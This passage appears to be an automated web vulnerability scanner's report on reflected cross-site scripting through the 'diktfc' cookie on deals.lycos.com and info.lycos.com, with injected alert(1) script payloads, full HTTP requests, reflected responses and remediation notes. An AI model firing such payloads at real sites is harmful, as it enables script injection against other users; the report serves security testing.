Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/sony-style-716&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d333"><script>alert(1)</script>bb3b7fe1ad4&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e01"><script>alert(1)</script>b0e1e045cc1 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/walmart-321 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A21e01"><script>alert(1)</script>b0e1e045cc1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47030
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/walmart-321&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A21e01"><script>alert(1)</script>b0e1e045cc1&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d3eb"%3balert(1)//81b4caeacf4 was submitted in the diktfc cookie. This input was echoed as 9d3eb";alert(1)//81b4caeacf4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/walmart-321 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d3eb"%3balert(1)//81b4caeacf4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47002
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c9bf"%3balert(1)//4aaaae1a092 was submitted in the diktfc cookie. This input was echoed as 7c9bf";alert(1)//4aaaae1a092 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7c9bf"%3balert(1)//4aaaae1a092; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87695
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1501"><script>alert(1)</script>87fbb33321 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /search HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac1501"><script>alert(1)</script>87fbb33321; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:12 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac1501"><script>alert(1)</script>87fbb33321&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33ede"%3balert(1)//7c98567bc37 was submitted in the diktfc cookie. This input was echoed as 33ede";alert(1)//7c98567bc37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A33ede"%3balert(1)//7c98567bc37; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28207
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafee"><script>alert(1)</script>fbcae48b9db was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /sitemap HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaafee"><script>alert(1)</script>fbcae48b9db; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28237
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/sitemap&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaafee"><script>alert(1)</script>fbcae48b9db&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63c5a"><script>alert(1)</script>3400436c004 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63c5a"><script>alert(1)</script>3400436c004; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info</title ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63c5a"><script>alert(1)</script>3400436c004.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6579b"%3balert(1)//ffb8b1bf352 was submitted in the diktfc cookie. This input was echoed as 6579b";alert(1)//ffb8b1bf352 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6579b"%3balert(1)//ffb8b1bf352; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:04 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15758
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3c4"><script>alert(1)</script>85e243e865f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bootstrap.js HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb3c4"><script>alert(1)</script>85e243e865f; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info</title ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb3c4"><script>alert(1)</script>85e243e865f.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab342"%3balert(1)//c4c4ec323f6 was submitted in the diktfc cookie. This input was echoed as ab342";alert(1)//c4c4ec323f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bootstrap.js HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aab342"%3balert(1)//c4c4ec323f6; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15770
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de0ae"><script>alert(1)</script>80df0ab27b8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /contact.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ade0ae"><script>alert(1)</script>80df0ab27b8; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Cont ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/contact.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ade0ae"><script>alert(1)</script>80df0ab27b8.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 886fa"%3balert(1)//da603ed9901 was submitted in the diktfc cookie. This input was echoed as 886fa";alert(1)//da603ed9901 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A886fa"%3balert(1)//da603ed9901; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Cont ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/contact.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A886fa";alert(1)//da603ed9901.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27849"%3balert(1)//a9b9c529a48 was submitted in the diktfc cookie. This input was echoed as 27849";alert(1)//a9b9c529a48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /copyright.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A27849"%3balert(1)//a9b9c529a48; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:07 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18589
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Abus ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/copyright.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A27849";alert(1)//a9b9c529a48.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d10bb"><script>alert(1)</script>e5827dbe638 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /copyright.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad10bb"><script>alert(1)</script>e5827dbe638; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:07 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
